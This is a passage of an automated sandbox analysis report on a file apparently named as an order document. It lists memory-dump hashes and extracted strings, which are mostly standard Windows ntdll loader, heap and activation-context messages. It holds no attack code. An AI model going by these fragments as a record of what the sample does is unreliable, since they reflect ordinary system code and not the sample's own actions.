                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-2160512332
                                • Opcode ID: 199d7836dc8c03e02fb984a875d4a8e68e95401d0b89da5daed25c27a823fc1a
                                • Instruction ID: 99094ed79f37d37a1c74f0f73dc003cf4a604f7e8c21edb828993924f28a2dc4
                                • Opcode Fuzzy Hash: 199d7836dc8c03e02fb984a875d4a8e68e95401d0b89da5daed25c27a823fc1a
                                • Instruction Fuzzy Hash: CD929F71614742AFE729DF28C880F6BB7E8BBA4B54F04492DFA94D7250D770E844CB92
                                Strings
                                • Thread is in a state in which it cannot own a critical section, xrefs: 011B5543
                                • Thread identifier, xrefs: 011B553A
                                • Critical section address., xrefs: 011B5502
                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011B540A, 011B5496, 011B5519
                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011B54E2
                                • Address of the debug info found in the active list., xrefs: 011B54AE, 011B54FA
                                • Invalid debug info address of this critical section, xrefs: 011B54B6
                                • Critical section address, xrefs: 011B5425, 011B54BC, 011B5534
                                • Critical section debug info address, xrefs: 011B541F, 011B552E
                                • corrupted critical section, xrefs: 011B54C2
                                • 8, xrefs: 011B52E3
                                • double initialized or corrupted critical section, xrefs: 011B5508
                                • undeleted critical section in freed memory, xrefs: 011B542B
                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011B54CE
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                • API String ID: 0-2368682639
                                • Opcode ID: e364782040ba47d618120cd20e672b1f40e168984ca49ffe3e22d634c53d2e61
                                • Instruction ID: 1094ec94fc61aa333bd0eebb7f3223972d6588d09c2fbfb1dc0df6eb36e094fd
                                • Opcode Fuzzy Hash: e364782040ba47d618120cd20e672b1f40e168984ca49ffe3e22d634c53d2e61
                                • Instruction Fuzzy Hash: 3B818AB0A41359EFEB68CF99C889BAEBBF6FB48714F104119F504B7250D3B5A941CB60
                                Strings
                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 011B2624
                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 011B261F
                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 011B2602
                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 011B2409
                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011B25EB
                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011B24C0
                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011B22E4
                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 011B2498
                                • @, xrefs: 011B259B
                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 011B2412
                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 011B2506
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                • API String ID: 0-4009184096
                                • Opcode ID: b84b9d961732211797afe29bc486f4b076eff6395c28efe906d7910b46bc2e26
                                • Instruction ID: 4b09d52678da1365dae56274f0477491283c3dcdfde389006128025be5ac71e2
                                • Opcode Fuzzy Hash: b84b9d961732211797afe29bc486f4b076eff6395c28efe906d7910b46bc2e26
                                • Instruction Fuzzy Hash: AE0271F1D002299BDB39DB54CC80BEAB7B8AF54704F0141DAE649A7241EB70AF85CF59
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                • API String ID: 0-2515994595
                                • Opcode ID: f480fcc3edbb1342687c5f1fdd1eb58b3f980e834b222a24f3f30425d477d528
                                • Instruction ID: c6444ed944b677fc2bc4e6e00346fd60bb3ab61a71b08f2dabf0c7e25c681d80
                                • Opcode Fuzzy Hash: f480fcc3edbb1342687c5f1fdd1eb58b3f980e834b222a24f3f30425d477d528
                                • Instruction Fuzzy Hash: 5051EF71104B019BC32DDF588848BABBBECFF99654F14492DFA99C3284E771D608CB92
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                • API String ID: 0-1700792311
                                • Opcode ID: 7529bc2a1fc94893d8ee0b9d80f065d62d3081eba68a544f18be6a5e6f0eb4a8
                                • Instruction ID: 1ee0ed4f0c99463773f69962d42e145576979f469d67e7a59c6e908772ba4d17
                                • Opcode Fuzzy Hash: 7529bc2a1fc94893d8ee0b9d80f065d62d3081eba68a544f18be6a5e6f0eb4a8
                                • Instruction Fuzzy Hash: 4BD1FB31604682DFDB2EDF68C405AAABBF2FF8A714F09805DF6459B252E734D981CB14
                                Strings
                                • AVRF: -*- final list of providers -*- , xrefs: 011C8B8F
                                • VerifierFlags, xrefs: 011C8C50
                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 011C8A3D
                                • VerifierDebug, xrefs: 011C8CA5
                                • HandleTraces, xrefs: 011C8C8F
                                • VerifierDlls, xrefs: 011C8CBD
                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 011C8A67
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                • API String ID: 0-3223716464
                                • Opcode ID: 30c91f7e8cf98be009e675d879ca8682e6ecb023c7f8a3ab6c8a998e4acebb73
                                • Instruction ID: bf1a8844659b51b5028d5942862fc407f8fecc39a7276ba669431673e69a2b1c
                                • Opcode Fuzzy Hash: 30c91f7e8cf98be009e675d879ca8682e6ecb023c7f8a3ab6c8a998e4acebb73
                                • Instruction Fuzzy Hash: E79137B1645712AFD72DDF68E8C4B6AB7E4ABA4F18F06041CFA446B240C770DD01CB96
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                • API String ID: 0-1109411897
                                • Opcode ID: a2badc4d905e5bee24e6d261ec015d63d9603a6b88d03c60b1b44a61e9292568
                                • Instruction ID: fc073f29a676e61315858f50ea94ba9b4cc33ba637fa02e2d133ea414e933c4b
                                • Opcode Fuzzy Hash: a2badc4d905e5bee24e6d261ec015d63d9603a6b88d03c60b1b44a61e9292568
                                • Instruction Fuzzy Hash: FFA25774A0562ACFDB68CF18C888BA9BBB1BF45704F5442E9D90DA7750DB749E81CF01
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-792281065
                                • Opcode ID: dba52b7e7c4d2f232d10c64b0042aa14d2be0a0e8c491ee31dd058e776b28608
                                • Instruction ID: 0b52620588a08be65255da9c503581000860f6b6bbe73c198c4837f34711cdc4
                                • Opcode Fuzzy Hash: dba52b7e7c4d2f232d10c64b0042aa14d2be0a0e8c491ee31dd058e776b28608
                                • Instruction Fuzzy Hash: 04913770B00B15ABFB2DDF18F888BEA7BB1BF51B18F044168E5066B782D7749801C791
                                Strings
                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01199A2A
                                • minkernel\ntdll\ldrinit.c, xrefs: 01199A11, 01199A3A
                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011999ED
                                • LdrpInitShimEngine, xrefs: 011999F4, 01199A07, 01199A30
                                • apphelp.dll, xrefs: 01136496
                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01199A01
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-204845295
                                • Opcode ID: 69590ee9e5b0bfe99282936aedfeb668c0c3bdaecc9dcb7d42785a19dbbdbb58
                                • Instruction ID: 2beaacda1fadfe62b963978a5dab22eee1708115b79464e24b0d84be65f08692
                                • Opcode Fuzzy Hash: 69590ee9e5b0bfe99282936aedfeb668c0c3bdaecc9dcb7d42785a19dbbdbb58
                                • Instruction Fuzzy Hash: CC519171208305AFEB2DDF24D845BAB77E8FB84648F00492DE59597194E734EA44CB93
                                Strings
                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 011B219F
                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 011B2180
                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 011B2178
                                • RtlGetAssemblyStorageRoot, xrefs: 011B2160, 011B219A, 011B21BA
                                • SXS: %s() passed the empty activation context, xrefs: 011B2165
                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011B21BF
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                • API String ID: 0-861424205
                                • Opcode ID: 65e97a0a7081400adace87d87a39dd498900bcd8fbf3484fd12e0eec31a6afdb
                                • Instruction ID: f8cc2e2e5ceb6e3c2ba68e1df5619b0dc3d973aabefa0f0ed59074d2ae4ccbb2
                                • Opcode Fuzzy Hash: 65e97a0a7081400adace87d87a39dd498900bcd8fbf3484fd12e0eec31a6afdb
                                • Instruction Fuzzy Hash: 8C31FB36F4022577F72D8A998C86F9BBB79DB75A90F05405DFB04B7241D370AA02C7A1
                                Strings
                                • minkernel\ntdll\ldrinit.c, xrefs: 0117C6C3
                                • LdrpInitializeImportRedirection, xrefs: 011B8177, 011B81EB
                                • minkernel\ntdll\ldrredirect.c, xrefs: 011B8181, 011B81F5
                                • Loading import redirection DLL: '%wZ', xrefs: 011B8170
                                • LdrpInitializeProcess, xrefs: 0117C6C4
                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 011B81E5
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                • API String ID: 0-475462383
                                • Opcode ID: e25ca7722a948e6020a81606f014410bad7bd9bc00aa600c42939b7fee91f237
                                • Instruction ID: 65e6007e50023a77f4a2600a0ecb46e951c06d7976bd8484261e4e173f589800
                                • Opcode Fuzzy Hash: e25ca7722a948e6020a81606f014410bad7bd9bc00aa600c42939b7fee91f237
                                • Instruction Fuzzy Hash: 5631F571644346AFD21CEF29D886F5A77E8EF94B18F04055CF944AB391E720ED04CBA2
                                APIs
                                  • Part of subcall function 01182DF0: LdrInitializeThunk.NTDLL ref: 01182DFA
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01180BA3
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01180BB6
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01180D60
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01180D74
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                • String ID:
                                • API String ID: 1404860816-0
                                • Opcode ID: 9bea629e25fa8ab0c753fe9f3cb134865eff84d677fdbb494ff52f4467eb3211
                                • Instruction ID: 0ea613a75771d0ce09003bd1c7241e3604afd231a4843f1312b0ee1184b8f5a9
                                • Opcode Fuzzy Hash: 9bea629e25fa8ab0c753fe9f3cb134865eff84d677fdbb494ff52f4467eb3211
                                • Instruction Fuzzy Hash: DE427D71900719DFDB69DF28C880BEAB7F4BF48304F1485A9E989DB241E770A985CF61
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                • API String ID: 0-379654539
                                • Opcode ID: e702f423aa5e9e9330106ae61e6fe37c88a4e02394a16fd4f4c4d3c8b58a39fa
                                • Instruction ID: b77db27a0d16c4efe650ac20fb7a555480fd41aeca44d3881e5b0ce9f5aec3fc
                                • Opcode Fuzzy Hash: e702f423aa5e9e9330106ae61e6fe37c88a4e02394a16fd4f4c4d3c8b58a39fa
                                • Instruction Fuzzy Hash: F6C1AD75148382CFD719CF58D144B6ABBE4FF84B04F0A886AF9968B251E734C949CB93
                                Strings
                                • minkernel\ntdll\ldrinit.c, xrefs: 01178421
                                • @, xrefs: 01178591
                                • LdrpInitializeProcess, xrefs: 01178422
                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0117855E
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-1918872054
                                • Opcode ID: 4af0f1cd7df60659ddeb99c3e644d79189176b4cfd99b63b4a7439b3e2b30198
                                • Instruction ID: 0cc9c0e623cb9648a0485771a7bb96694d86de721431af12dbb8e28fec40e51a
                                • Opcode Fuzzy Hash: 4af0f1cd7df60659ddeb99c3e644d79189176b4cfd99b63b4a7439b3e2b30198
                                • Instruction Fuzzy Hash: 96918E71508345AFD72AEF65CC84FABBAECBF84744F40492EFA8492251E770D944CB62
                                Strings
                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011B21D9, 011B22B1
                                • .Local, xrefs: 011728D8
                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011B22B6
                                • SXS: %s() passed the empty activation context, xrefs: 011B21DE
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                • API String ID: 0-1239276146
                                • Opcode ID: 1228fda842fd1646480b35f92ff4b469a638b845ffd54236f1b72c787c7acf41
                                • Instruction ID: daf5065e9f4b46fb99c2377e4d136b352bf7d44da9a9bc9135cf24b9ea346de2
                                • Opcode Fuzzy Hash: 1228fda842fd1646480b35f92ff4b469a638b845ffd54236f1b72c787c7acf41
                                • Instruction Fuzzy Hash: B1A1A131900229DBDB2DCF68C884BE9B7B1BF58354F1941E9D908A7351E730AE86CF91
                                Strings
                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 011B3456
                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 011B342A
                                • RtlDeactivateActivationContext, xrefs: 011B3425, 011B3432, 011B3451
                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 011B3437
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                • API String ID: 0-1245972979
                                • Opcode ID: c7af0fa997a88756fd8c5714edb23563e01e03d2b6937c0b400d24e380a586cd
                                • Instruction ID: 1c6573eda8cfbaad398533882460ac64281555a96e7e041a35aea2fb82dcbb49
                                • Opcode Fuzzy Hash: c7af0fa997a88756fd8c5714edb23563e01e03d2b6937c0b400d24e380a586cd
                                • Instruction Fuzzy Hash: 78612132610B129FD72ECF1CC881B7AB7E1BF90B50F158529E8659B740DB34E811CB91
                                Strings
                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 011A0FE5
                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 011A106B
                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011A10AE
                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 011A1028
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                • API String ID: 0-1468400865
                                • Opcode ID: a396523a9e4b1102051993e47eb1bac0871c3f5f051dafd3a1efd73a676bae6f
                                • Instruction ID: af60f0beddf2ab8bf0f54582d4f65d9741a1447226de04cf5f50f44b571e1be6
                                • Opcode Fuzzy Hash: a396523a9e4b1102051993e47eb1bac0871c3f5f051dafd3a1efd73a676bae6f
                                • Instruction Fuzzy Hash: 6871F2B1904345AFCB25EF14C884B977FA9AF95BA8F400468F9488B146D334D589CFD2
                                Strings
                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 011B362F
                                • minkernel\ntdll\ldrsnap.c, xrefs: 011B3640, 011B366C
                                • LdrpFindDllActivationContext, xrefs: 011B3636, 011B3662
                                • Querying the active activation context failed with status 0x%08lx, xrefs: 011B365C
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                • API String ID: 0-3779518884
                                • Opcode ID: 58b3c0bba0a55928556a4f1a59063b8df05e6f90ea43f1955366bb68a5798628
                                • Instruction ID: 26ed4d1f34b2bf9a83635b19f34ec1759fb59999136a5dc6df939862e5b77252
                                • Opcode Fuzzy Hash: 58b3c0bba0a55928556a4f1a59063b8df05e6f90ea43f1955366bb68a5798628
                                • Instruction Fuzzy Hash: B4312932900251AEEF3EEA4CD888BBDB6B8FB21754F06402AE99457B51D7A09D8087D5
                                Strings
                                • minkernel\ntdll\ldrinit.c, xrefs: 011AA9A2
                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 011AA992
                                • apphelp.dll, xrefs: 01162462
                                • LdrpDynamicShimModule, xrefs: 011AA998
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-176724104
                                • Opcode ID: 0d60422ef3c5f6ec6afb91d45022a43e96d8beacbe08fc3ec02141c9a9959912
                                • Instruction ID: 90179b60e5f43f77ff011686619fb6e94bfa24dc02cf1535bf96dc5bca196c32
                                • Opcode Fuzzy Hash: 0d60422ef3c5f6ec6afb91d45022a43e96d8beacbe08fc3ec02141c9a9959912
                                • Instruction Fuzzy Hash: 67314A75A00302EBDB3DDF5DF849AAA7BB8FF84B04F560019E9016B245D7B09A51C780
                                Strings
                                • HEAP[%wZ]: , xrefs: 01153255
                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0115327D
                                • HEAP: , xrefs: 01153264
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                • API String ID: 0-617086771
                                • Opcode ID: ef0f8e6786c4fcae9a3c61e1415f5cc4033c22e5e7ec18bb7276eff0a7f6843e
                                • Instruction ID: 30b106aeb0594844bc1be1afcf5382d15366eb4470cb0e781840db42d4839b26
                                • Opcode Fuzzy Hash: ef0f8e6786c4fcae9a3c61e1415f5cc4033c22e5e7ec18bb7276eff0a7f6843e
                                • Instruction Fuzzy Hash: 0D92CD71A04649DFDB69CF68C444BAEBBF1FF48304F188099E869AB392D735A941CF50
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                • API String ID: 0-4253913091
                                • Opcode ID: 908931b0760e9dba248d2600aa7d20a7afaa230a48b3c658910a0c9cb2830385
                                • Instruction ID: db1c5803d1f09615b81dcc20321786901511def1105587d2025faa09cfe240f9
                                • Opcode Fuzzy Hash: 908931b0760e9dba248d2600aa7d20a7afaa230a48b3c658910a0c9cb2830385
                                • Instruction Fuzzy Hash: CFF1CF34A04606DFDB5DCFA8C894F6ABBB2FF48304F154169E8269B385D730E981CB51
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID: $@
                                • API String ID: 2994545307-1077428164
                                • Opcode ID: bf4ac688bff722c6a30086bc082393dd0ea3ac0ddf975a54b39c28257abbf2d7
                                • Instruction ID: 25b0c107251edd5e85a15c9d4409c9d08786f6f2b264978d128ae399fe147692
                                • Opcode Fuzzy Hash: bf4ac688bff722c6a30086bc082393dd0ea3ac0ddf975a54b39c28257abbf2d7
                                • Instruction Fuzzy Hash: 72C290716083419FE72DCF28C840BABBBE9BF88758F05892DE989C7241D735D855CB92
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2166776693.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_1110000_ORDER_1105-19-24-3537.jbxd
                                Similarity
                                • API ID:
                                • String ID: FilterFullPath$UseFilter$\??\
                                • API String ID: 0-2779062949
                                • Opcode ID: b4040c4afc4d39d86dc56980d40282212a6db0548d3ed2f46cda3e4722747f5a
